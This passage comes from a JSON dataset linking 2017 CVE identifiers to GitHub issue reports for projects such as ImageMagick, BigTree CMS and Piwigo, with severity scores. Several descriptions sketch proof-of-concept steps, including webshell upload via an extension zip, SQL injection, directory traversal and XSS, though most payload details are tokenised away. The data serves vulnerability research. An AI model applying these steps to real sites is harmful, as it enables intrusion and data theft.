  15633. "Issue_Created_At": "2017-04-28T04:01:21Z",
  15634. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG d9 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG b2c NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15635. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15636. "severity": "MEDIUM",
  15637. "baseScore": 6.5,
  15638. "impactScore": 3.6,
  15639. "exploitabilityScore": 2.8
  15640. },
  15641. {
  15642. "CVE_ID": "CVE-2017-9416",
  15643. "Issue_Url_old": "https://github.com/odoo/odoo/issues/17394",
  15644. "Issue_Url_new": "https://github.com/odoo/odoo/issues/17394",
  15645. "Repo_new": "odoo/odoo",
  15646. "Issue_Created_At": "2017-06-02T23:38:19Z",
  15647. "description": "reserved .",
  15648. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  15649. "severity": "MEDIUM",
  15650. "baseScore": 6.5,
  15651. "impactScore": 3.6,
  15652. "exploitabilityScore": 2.8
  15653. },
  15654. {
  15655. "CVE_ID": "CVE-2017-9427",
  15656. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/288",
  15657. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/288",
  15658. "Repo_new": "bigtreecms/bigtree-cms",
  15659. "Issue_Created_At": "2017-06-03T12:03:16Z",
  15660. "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG shou me the code: file PATHTAG APITAG continue the function APITAG file PATHTAG ERRORTAG here the $_POST[\"table\"] to $table to sqlescape($table)\uff0c final INSERT INTO database table bigtree_module_forms. continue file PATHTAG CODETAG continue\uff0c at APITAG function SELECT FROM bigtree_module_forms ERRORTAG at here, $admin APITAG to $modules to $m, final sqlquery(\"SELECT id FROM APITAG \") POC\uff1a one step\uff0ccreate module xfkxfk\uff0c on url\uff1a URLTAG two step\uff0c create module xfkxfk2\uff0cbut the table name is\uff1axfkxfk APITAG where NUMBERTAG and APITAG APITAG )\uff0c on url\uff1a URLTAG three step\uff0c request the url\uff0csql inject here\uff1a URLTAG email : EMAILTAG",
  15661. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15662. "severity": "HIGH",
  15663. "baseScore": 8.8,
  15664. "impactScore": 5.9,
  15665. "exploitabilityScore": 2.8
  15666. },
  15667. {
  15668. "CVE_ID": "CVE-2017-9428",
  15669. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/289",
  15670. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/289",
  15671. "Repo_new": "bigtreecms/bigtree-cms",
  15672. "Issue_Created_At": "2017-06-04T07:05:02Z",
  15673. "description": "Directory Traversal in bigtreecms NUMBERTAG Directory Traversal in bigtreecms NUMBERTAG FILE: PATHTAG at here, just filter .. and /, but we can use \\ bypass on windows POC: > POST PATHTAG HTTP NUMBERTAG Host: localhost > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: text/html, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG > Accept Encoding: gzip, deflate > Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG > Referer: URLTAG > Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG hide_bigtree_bar= > Connection: keep alive > > PATHTAG email : EMAILTAG",
  15674. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  15675. "severity": "HIGH",
  15676. "baseScore": 7.5,
  15677. "impactScore": 3.6,
  15678. "exploitabilityScore": 3.9
  15679. },
  15680. {
  15681. "CVE_ID": "CVE-2017-9434",
  15682. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/414",
  15683. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/414",
  15684. "Repo_new": "weidai11/cryptopp",
  15685. "Issue_Created_At": "2017-05-10T21:00:45Z",
  15686. "description": "Zinflate and APITAG finding. We started fuzzing library classes. Its dumb fuzzing, and all we do is generate a random string and send it into a filter like Inflator or ERRORTAG . It looks like Inflator is having some trouble. The assert below was added when we noticed some odd behavior. ERRORTAG Running under Address Sanitizer results in: ERRORTAG",
  15687. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  15688. "severity": "MEDIUM",
  15689. "baseScore": 5.3,
  15690. "impactScore": 1.4,
  15691. "exploitabilityScore": 3.9
  15692. },
  15693. {
  15694. "CVE_ID": "CVE-2017-9439",
  15695. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/460",
  15696. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/460",
  15697. "Repo_new": "imagemagick/imagemagick",
  15698. "Issue_Created_At": "2017-04-28T04:02:49Z",
  15699. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d NUMBERTAG fcb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG f3a3 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d0b0bb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Credit: APITAG of Venustech",
  15700. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15701. "severity": "MEDIUM",
  15702. "baseScore": 6.5,
  15703. "impactScore": 3.6,
  15704. "exploitabilityScore": 2.8
  15705. },
  15706. {
  15707. "CVE_ID": "CVE-2017-9440",
  15708. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/462",
  15709. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/462",
  15710. "Repo_new": "imagemagick/imagemagick",
  15711. "Issue_Created_At": "2017-04-28T04:10:28Z",
  15712. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fcc6d NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG fcc NUMBERTAG adfd NUMBERTAG in APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c6e1 in APITAG APITAG NUMBERTAG e7d1 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fcc NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15713. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15714. "severity": "MEDIUM",
  15715. "baseScore": 6.5,
  15716. "impactScore": 3.6,
  15717. "exploitabilityScore": 2.8
  15718. },
  15719. {
  15720. "CVE_ID": "CVE-2017-9441",
  15721. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/290",
  15722. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/290",
  15723. "Repo_new": "bigtreecms/bigtree-cms",
  15724. "Issue_Created_At": "2017-06-05T08:32:27Z",
  15725. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Multiple Security Issue of XSS exists in APITAG CMS Less than NUMBERTAG file\uff1a ERRORTAG title\u3001version\u3001author_name not filter by APITAG function POC\uff1a in url\uff1a URLTAG upload FILETAG \uff0cthere is FILETAG in FILETAG ERRORTAG when upload xfkxfk.zip successful, result in a xss vuln (you can also build extensions, then download extensions, final modify extension and install it) FILETAG please use APITAG function to filter params~ thank you~ email \uff1a EMAILTAG",
  15726. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15727. "severity": "MEDIUM",
  15728. "baseScore": 5.4,
  15729. "impactScore": 2.7,
  15730. "exploitabilityScore": 2.3
  15731. },
  15732. {
  15733. "CVE_ID": "CVE-2017-9442",
  15734. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/291",
  15735. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/291",
  15736. "Repo_new": "bigtreecms/bigtree-cms",
  15737. "Issue_Created_At": "2017-06-05T08:53:02Z",
  15738. "description": "getshell in bigtreecms NUMBERTAG Multiple Security Issue of code execution exists in APITAG CMS Less than NUMBERTAG FILE\uff1a PATHTAG ERRORTAG we can upload a zip file which containing the PHP code\uff0c then Unpacked to PATHTAG POC NUMBERTAG build extension APITAG modules, templates, callouts, field types, feeds, and settings to your extension. APITAG additional files to your extension NUMBERTAG create extension NUMBERTAG download extension\uff08a zip file NUMBERTAG modify webshell content to php file in extension\uff08a zip file NUMBERTAG install extension NUMBERTAG the shell in PATHTAG FILETAG thank you~ email \uff1a EMAILTAG",
  15739. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15740. "severity": "HIGH",
  15741. "baseScore": 8.8,
  15742. "impactScore": 5.9,
  15743. "exploitabilityScore": 2.8
  15744. },
  15745. {
  15746. "CVE_ID": "CVE-2017-9443",
  15747. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/292",
  15748. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/292",
  15749. "Repo_new": "bigtreecms/bigtree-cms",
  15750. "Issue_Created_At": "2017-06-05T08:59:45Z",
  15751. "description": "SQL code execution in bigtreecms NUMBERTAG Multiple Security Issue of SQL code execution exists in APITAG CMS Less than NUMBERTAG FILE\uff1a PATHTAG CODETAG continue APITAG function PATHTAG ERRORTAG Note here\uff1a > APITAG as $table_name => $sql_statement > sqlquery($sql_statement); we can execute any sql code at here",
  15752. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15753. "severity": "HIGH",
  15754. "baseScore": 8.8,
  15755. "impactScore": 5.9,
  15756. "exploitabilityScore": 2.8
  15757. },
  15758. {
  15759. "CVE_ID": "CVE-2017-9444",
  15760. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/293",
  15761. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/293",
  15762. "Repo_new": "bigtreecms/bigtree-cms",
  15763. "Issue_Created_At": "2017-06-05T09:50:37Z",
  15764. "description": "Multiple CSRF exists in APITAG CMS Less than NUMBERTAG Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG one with the name\u3001password\u3001company parameters to the PATHTAG poc, APITAG CODETAG request FILETAG then you will update developer user's profile. other csrf vuln: URLTAG URLTAG URLTAG repair you my be use APITAG function before do these. thank you ! email: EMAILTAG",
  15765. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15766. "severity": "HIGH",
  15767. "baseScore": 8.8,
  15768. "impactScore": 5.9,
  15769. "exploitabilityScore": 2.8
  15770. },
  15771. {
  15772. "CVE_ID": "CVE-2017-9448",
  15773. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/294",
  15774. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/294",
  15775. "Repo_new": "bigtreecms/bigtree-cms",
  15776. "Issue_Created_At": "2017-06-06T01:53:13Z",
  15777. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Cross site Scripting (XSS) in bigtreecms NUMBERTAG We can use low privileged\uff08 administrator\uff09 users to attack high privileged\uff08D eveloper\uff09 users POC NUMBERTAG add a administrator user NUMBERTAG login with user NUMBERTAG request URLTAG \uff0csave a published revisions\uff1a > POST PATHTAG HTTP NUMBERTAG Host: APITAG > User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / > Accept Language: zh CN,zh; APITAG US; APITAG > Accept Encoding: gzip, deflate > Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG > Referer: URLTAG > Content Length NUMBERTAG Cookie: > Connection: keep alive > > APITAG > APITAG the param description have a xss vuln NUMBERTAG when the developer user login\uff0c and request\uff1a URLTAG the developer user will be xssed~",
  15778. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15779. "severity": "MEDIUM",
  15780. "baseScore": 5.4,
  15781. "impactScore": 2.7,
  15782. "exploitabilityScore": 2.3
  15783. },
  15784. {
  15785. "CVE_ID": "CVE-2017-9449",
  15786. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/295",
  15787. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/295",
  15788. "Repo_new": "bigtreecms/bigtree-cms",
  15789. "Issue_Created_At": "2017-06-06T02:46:27Z",
  15790. "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG FILE\uff1a PATHTAG at first\uff0c Create the view APITAG then search the view PATHTAG CODETAG cointinue PATHTAG ERRORTAG here the var $view[\"table\"] have a sqli vuln",
  15791. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  15792. "severity": "HIGH",
  15793. "baseScore": 8.8,
  15794. "impactScore": 5.9,
  15795. "exploitabilityScore": 2.8
  15796. },
  15797. {
  15798. "CVE_ID": "CVE-2017-9451",
  15799. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/34",
  15800. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/34",
  15801. "Repo_new": "flatcore/flatcore-cms",
  15802. "Issue_Created_At": "2017-05-24T08:24:55Z",
  15803. "description": "XSS Vulnerability in FILETAG on APITAG NUMBERTAG Title: XSS Vulnerability in FILETAG Security: Low (visit FILETAG as a administrator) Software: FILETAG Reproduce: (get client cookie information) URLTAG FILETAG reference about XSS: URLTAG url",
  15804. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15805. "severity": "MEDIUM",
  15806. "baseScore": 6.1,
  15807. "impactScore": 2.7,
  15808. "exploitabilityScore": 2.8
  15809. },
  15810. {
  15811. "CVE_ID": "CVE-2017-9452",
  15812. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/667",
  15813. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/667",
  15814. "Repo_new": "piwigo/piwigo",
  15815. "Issue_Created_At": "2017-05-04T02:12:31Z",
  15816. "description": "Cross Site Scripting(XSS) in page parameter of FILETAG . Latest Version of piwigo is vulnerable to cross site scripting vulnerability in FILETAG , remote attacker may inject and execute arbitrary javascript via the page parameter. HTTP REQUEST: GET APITAG APITAG APITAG tcs7a HTTP NUMBERTAG Host NUMBERTAG APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG Connection: close Upgrade Insecure Requests NUMBERTAG RESPONSE: HTTP NUMBERTAG OK Date: Wed NUMBERTAG May NUMBERTAG GMT Server: APITAG APITAG APITAG APITAG X Powered By: APITAG Expires: Thu NUMBERTAG No NUMBERTAG GMT Cache Control: no store, no cache, must revalidate, post check NUMBERTAG pre check NUMBERTAG Pragma: no cache Connection: close Content Type: text/html; charset=utf NUMBERTAG Content Length NUMBERTAG APITAG APITAG APITAG root APITAG APITAG APITAG APITAG \u6d4f\u89c8\u56fe\u5e93 APITAG APITAG APITAG APITAG alert NUMBERTAG APITAG tcs7a&amp;change_theme NUMBERTAG class=\"tiptip\" title=\"\u66f4\u6539\u7ba1\u7406\u754c\u9762\u4e3a\u6e05\u723d\u6216\u8005\u70ab\u9ed1\u7684\u989c\u8272\"> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u5e2e\u52a9 APITAG APITAG APITAG APITAG APITAG APITAG \u6ce8\u9500 APITAG APITAG APITAG APITAG .......",
  15817. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  15818. "severity": "MEDIUM",
  15819. "baseScore": 4.8,
  15820. "impactScore": 2.7,
  15821. "exploitabilityScore": 1.7
  15822. },
  15823. {
  15824. "CVE_ID": "CVE-2017-9463",
  15825. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/705",
  15826. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/705",
  15827. "Repo_new": "piwigo/piwigo",
  15828. "Issue_Created_At": "2017-06-13T10:30:13Z",
  15829. "description": "user list backend, check input parameter. To avoid any possible security issue, let's check the input parameters",
  15830. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  15831. "severity": "MEDIUM",
  15832. "baseScore": 6.5,
  15833. "impactScore": 3.6,
  15834. "exploitabilityScore": 2.8
  15835. },
  15836. {
  15837. "CVE_ID": "CVE-2017-9464",
  15838. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/706",
  15839. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/706",
  15840. "Repo_new": "piwigo/piwigo",
  15841. "Issue_Created_At": "2017-06-14T08:11:25Z",
  15842. "description": "[security] identification should redirect within Piwigo only. The APITAG system in FILETAG can lead to redirect outside Piwigo. On any location actually. To avoid any \"open redirect\" security issue, Piwigo should make sure the redirection occurs only with Piwigo, not outside.",
  15843. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15844. "severity": "MEDIUM",
  15845. "baseScore": 6.1,
  15846. "impactScore": 2.7,
  15847. "exploitabilityScore": 2.8
  15848. },
  15849. {
  15850. "CVE_ID": "CVE-2017-9465",
  15851. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/678",
  15852. "Issue_Url_new": "https://github.com/virustotal/yara/issues/678",
  15853. "Repo_new": "virustotal/yara",
  15854. "Issue_Created_At": "2017-06-06T14:40:43Z",
  15855. "description": "Invalid memory access (potential information disclosure) in APITAG Invalid memory access (potential information disclosure) in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  15856. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  15857. "severity": "HIGH",
  15858. "baseScore": 7.1,
  15859. "impactScore": 5.2,
  15860. "exploitabilityScore": 1.8
  15861. },
  15862. {
  15863. "CVE_ID": "CVE-2017-9499",
  15864. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/492",
  15865. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/492",
  15866. "Repo_new": "imagemagick/imagemagick",
  15867. "Issue_Created_At": "2017-05-15T18:14:47Z",
  15868. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in pixel accessor.h. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  15869. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15870. "severity": "MEDIUM",
  15871. "baseScore": 6.5,
  15872. "impactScore": 3.6,
  15873. "exploitabilityScore": 2.8
  15874. },
  15875. {
  15876. "CVE_ID": "CVE-2017-9500",
  15877. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/500",
  15878. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/500",
  15879. "Repo_new": "imagemagick/imagemagick",
  15880. "Issue_Created_At": "2017-05-23T17:06:00Z",
  15881. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in profile.c. CODETAG testcase \uff1a URLTAG Credit \uff1a APITAG of Venustech",
  15882. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15883. "severity": "MEDIUM",
  15884. "baseScore": 6.5,
  15885. "impactScore": 3.6,
  15886. "exploitabilityScore": 2.8
  15887. },
  15888. {
  15889. "CVE_ID": "CVE-2017-9501",
  15890. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/491",
  15891. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/491",
  15892. "Repo_new": "imagemagick/imagemagick",
  15893. "Issue_Created_At": "2017-05-15T18:14:07Z",
  15894. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in semaphore.c. CODETAG testcase \uff1a URLTAG Credit : APITAG of Venustech",
  15895. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15896. "severity": "MEDIUM",
  15897. "baseScore": 6.5,
  15898. "impactScore": 3.6,
  15899. "exploitabilityScore": 2.8
  15900. },
  15901. {
  15902. "CVE_ID": "CVE-2017-9520",
  15903. "Issue_Url_old": "https://github.com/radare/radare2/issues/7698",
  15904. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7698",
  15905. "Repo_new": "radareorg/radare2",
  15906. "Issue_Created_At": "2017-06-07T19:12:45Z",
  15907. "description": "Use after free in APITAG Use after free in APITAG HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  15908. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15909. "severity": "MEDIUM",
  15910. "baseScore": 5.5,
  15911. "impactScore": 3.6,
  15912. "exploitabilityScore": 1.8
  15913. },
  15914. {
  15915. "CVE_ID": "CVE-2017-9527",
  15916. "Issue_Url_old": "https://github.com/mruby/mruby/issues/3486",
  15917. "Issue_Url_new": "https://github.com/mruby/mruby/issues/3486",
  15918. "Repo_new": "mruby/mruby",
  15919. "Issue_Created_At": "2017-03-07T18:22:46Z",
  15920. "description": "Heap use after free in mark_context_stack. The following input to mruby demonstrates a heap use after free bug: FILETAG To demonstrate, build with clang & ASAN ( APITAG ) or use gcc & valgrind. ASAN report: ERRORTAG Valgrind report: ERRORTAG This issue was reported by URLTAG",
  15921. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15922. "severity": "HIGH",
  15923. "baseScore": 7.8,
  15924. "impactScore": 5.9,
  15925. "exploitabilityScore": 1.8
  15926. },
  15927. {
  15928. "CVE_ID": "CVE-2017-9546",
  15929. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/298",
  15930. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/298",
  15931. "Repo_new": "bigtreecms/bigtree-cms",
  15932. "Issue_Created_At": "2017-06-08T11:33:52Z",
  15933. "description": "Denial of Service in bigtreecms NUMBERTAG Hi, I found a denial of service vulnerability in bigtreecms NUMBERTAG The POC is below: Login with Administrator and edit a page,then add a revision,input APITAG FILETAG Then FILETAG And generate a wrong report, leak the source code,but you can\u2019t save resivion any more",
  15934. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H",
  15935. "severity": "MEDIUM",
  15936. "baseScore": 5.7,
  15937. "impactScore": 3.6,
  15938. "exploitabilityScore": 2.1
  15939. },
  15940. {
  15941. "CVE_ID": "CVE-2017-9547",
  15942. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/297",
  15943. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/297",
  15944. "Repo_new": "bigtreecms/bigtree-cms",
  15945. "Issue_Created_At": "2017-06-08T10:04:12Z",
  15946. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Hi, I found a cross site scripting vulnerability in bigtreecms NUMBERTAG The POC is below: Login with Administrator and Edit Page FILETAG then click save&preview FILETAG",
  15947. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15948. "severity": "MEDIUM",
  15949. "baseScore": 5.4,
  15950. "impactScore": 2.7,
  15951. "exploitabilityScore": 2.3
  15952. },
  15953. {
  15954. "CVE_ID": "CVE-2017-9548",
  15955. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/296",
  15956. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/296",
  15957. "Repo_new": "bigtreecms/bigtree-cms",
  15958. "Issue_Created_At": "2017-06-08T05:19:59Z",
  15959. "description": "Stored Cross site Scripting in bigtreecms NUMBERTAG Hi, I found a stored cross site scripting vulnerability in bigtreecms NUMBERTAG The POC is below: With Developer: Edit a page with Tempalte Home FILETAG With Administrator or Normal APITAG a Revision created in Previous step FILETAG FILETAG Click Overwrite,then click save&preview, FILETAG",
  15960. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15961. "severity": "MEDIUM",
  15962. "baseScore": 5.4,
  15963. "impactScore": 2.7,
  15964. "exploitabilityScore": 2.3
  15965. },
  15966. {
  15967. "CVE_ID": "CVE-2017-9609",
  15968. "Issue_Url_old": "https://github.com/BlackCatDevelopment/BlackCatCMS/issues/373",
  15969. "Issue_Url_new": "https://github.com/blackcatdevelopment/blackcatcms/issues/373",
  15970. "Repo_new": "blackcatdevelopment/blackcatcms",
  15971. "Issue_Created_At": "2017-06-21T10:29:10Z",
  15972. "description": "XSS in Blackcat cms NUMBERTAG Hello, I would like to report a vulnerability that I have found on Blackcat cms NUMBERTAG in which Cross Site Scripting(XSS) attack is possible. For details please go through attached document. Blackcat cms NUMBERTAG ss POC by Provensec FILETAG Regards, Faiz Ahmed Zaidi",
  15973. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15974. "severity": "MEDIUM",
  15975. "baseScore": 5.4,
  15976. "impactScore": 2.7,
  15977. "exploitabilityScore": 2.3
  15978. },
  15979. {
  15980. "CVE_ID": "CVE-2017-9621",
  15981. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/185",
  15982. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/185",
  15983. "Repo_new": "Telaxus/EPESI",
  15984. "Issue_Created_At": "2017-05-05T04:06:19Z",
  15985. "description": "Stored Cross Site Scriping. PATHTAG code: APITAG poc: login >menu >language&translations >PHP environment check(all item) > ERRORTAG >confirm FILETAG",
  15986. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15987. "severity": "MEDIUM",
  15988. "baseScore": 6.1,
  15989. "impactScore": 2.7,
  15990. "exploitabilityScore": 2.8
  15991. },
  15992. {
  15993. "CVE_ID": "CVE-2017-9622",
  15994. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/186",
  15995. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/186",
  15996. "Repo_new": "Telaxus/EPESI",
  15997. "Issue_Created_At": "2017-05-05T06:32:58Z",
  15998. "description": "Multiple Stored Cross Site Scriping NUMBERTAG poc:login >menu >administrator >common data >add array(or change) >key(or value) ERRORTAG >confirm FILETAG NUMBERTAG poc:login >menu >administrator >currencies >new(or edit) >decimal sign > ERRORTAG >save FILETAG NUMBERTAG poc:login >menu >administrator >countries >add array(or change) >key(or value) ERRORTAG >confirm FILETAG",
  15999. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  16000. "severity": "MEDIUM",
  16001. "baseScore": 6.1,
  16002. "impactScore": 2.7,
  16003. "exploitabilityScore": 2.8
  16004. },
  16005. {
  16006. "CVE_ID": "CVE-2017-9668",
  16007. "Issue_Url_old": "https://github.com/XiaoZhis/ProjectSend/issues/2",
  16008. "Issue_Url_new": "https://github.com/xiaozhis/projectsend/issues/2",
  16009. "Repo_new": "xiaozhis/projectsend",
  16010. "Issue_Created_At": "2017-06-17T09:14:34Z",
